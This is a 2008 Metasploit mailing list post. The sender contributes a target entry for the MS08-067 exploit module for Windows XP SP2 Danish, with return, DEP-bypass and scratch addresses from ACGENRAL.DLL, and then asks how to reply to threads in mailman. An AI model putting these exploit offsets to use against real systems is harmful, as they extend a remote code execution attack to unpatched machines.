Metasploit mailing list archives

MS08-067 Opcodes for WinXP SP2 Danish

From: metafan at intern0t.net (MaXe)
Date: Fri, 31 Oct 2008 16:08:26 +0100

Hello there,

Here's the addresses for Windows XP (Pro) SP2 Danish (i haven't been
able to get SP3, yet:
                    [ 'Windows XP SP2 Danish (DEP)',
                        {
                            'Ret'       => 0x5978f727,
                            'DisableNX' => 0x597916e2,
                            'Scratch'   => 0x00020408,
                        }
                    ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL

I have also been trying to figure out how to reply to mails/threads sent
to the list, but somehow
i'm a big noob at using mailman and i have even tried google'ing to find
out how to reply to a
mail-thread without luck, so i would be thankful if anyone could tell me
how to do that.

(I only know how to sent new threads to the list)

~ MaXe #